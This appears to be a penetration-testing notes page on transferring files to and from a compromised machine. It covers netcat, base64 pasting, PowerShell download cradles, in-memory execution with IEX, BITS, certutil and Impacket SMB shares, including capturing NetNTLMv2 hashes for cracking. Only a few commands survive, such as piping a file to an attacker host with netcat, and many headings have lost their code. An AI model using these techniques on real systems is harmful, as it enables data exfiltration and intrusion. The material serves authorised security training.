Transferring files
First step after gaining access to a remote machine is to upload new tools.
Linux
Netcat
on target run:
nc -lvp 443> transfer.txt
on attacker run:
nc $ip 443 < transfer.txtor
on attacker run:
nc -lvp 443> transfer.txt
on target run:
cat transfer.txt | nc $attackerip 443The attack box can now connect to port 443 and download a file called transfer.txt
ProTip
If u ever happen to have a shell of a UNIX system, and cannot find a way to upload anything, this is a lifesaver trick you can try:
On local system:
cat filetoupload | base64 -w 0; echo
#double click on output to copy
On Target System:
echo <copiedContent> | base64 -d > filetouploadStart a web server in your local machine serving files within the current folder:
Send files using different commands:
As an FTP server, metasploit has built in one:
Simple Fast python FTP server no login details necessary
SMB share server:
Curl put:
Linux, mounting a samba share:
Simple HTTP Server with Upload
PHP
Python
Windows
In most environments, HTTP/HTTPS traffic is allowed out of the firewall in some form - and if we have a GUI session, a web browser could also be used. However, from a Windows shell, PowerShell offers many file transfer options. In any version of PowerShell, the System.Net.WebClient class can be used to download a file over HTTP.
From PowerShell 3.0, Invoke-WebRequest is also available, but it is noticeably slower at downloading files. The aliases iwr, curl, and wget can be used instead of Invoke-WebRequest.
Instead of downloading to disk, the payload can instead be executed in memory, using Invoke-Expression, or the alias iex.
IEX also accepts pipeline input.
There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download.
This can be bypassed using the parameter -UseBasicParsing.
Alternatively, with administrative access to the machine, we can disable Internet Explorer’s First Run customization.
Powershell download cradles that do not observe Internet Explorer’s first-run check can also be used. Harmj0y has compiled an extensive list of PowerShell download cradles here. It is worth gaining familiarity with them and their individual nuances, such as not observing a proxy or touching a disk to select the appropriate one for the situation.
PowerShell File Uploads
It is also possible to upload files using Powershell using Invoke-WebRequest or Invoke-RestMethod.
After catching the base64 data with Netcat, the payload can be decoded.
Bitsadmin
The Background Intelligent Transfer Service (BITS) can download files from HTTP sites and SMB shares. It "intelligently" checks host and network utilization into account to minimize the impact on a user’s foreground work.
PowerShell also enables interaction with BITS, enables file downloads and uploads, supports credentials, and can use specified proxy servers.
Download
Upload
Certutil
Casey Smith (@subTee) found that certutil can be used to download arbitrary files. It is available in all Windows versions and has been a very popular file transfer technique, essentially serving as Wget for Windows. However, the Antimalware Scan Interface (AMSI) currently detects this as malicious certutil usage.
nc.exe paste the following code
Echo up
https://pentest.ws/e/mQx1MdxD#tools/echo-up
Bounce port scanning
Nice trick to share folders with RDP:
With Powershell:
Powercat
Installs to /usr/share/windows-resources/powercat
wget
Paste the following block in a command line to get a web client:
Run with:
HTTP: Powershell
SMB
Impacket SMBServer
Impacket is my preferred method of setting up a file transfer over SMB because it does not run in the background or involve modifying configuration files. We can use smbserver.py specifically. If other people attempt to connect to the service, it has the bonus that it will display a NetNTLMv2 hash that, if successfully cracked, will reveal the password.
Impacket SMBServer - Syntax
It is essential always to have a separate order for file transfers to prevent unauthorized persons from gaining access to our local data. For example, if we would use our home directory to transfer the desired data and an unauthorized person accesses it, he will be able to navigate to the ".ssh" directory and find the SSH keys, which can be used against us.
We can set up an SMB share on our Pwnbox called "FileTransfer", but we create our folder for it before. Now we can share our current working directory.
To verify the share was created and accessible, we can run:
Going to our Impacket terminal, we can see the connection and if we had not known the user's password before. We could use the line under "Authenticated Successfully" to Hashcat and attempt to crack it.
Impacket SMBServer - Listening
In some cases, computers will not allow anonymous SMB connections. In this case, we may want to use the user/password flags to allow authentication on our SMB server. This can be done with the following command:
Last updated
Was this helpful?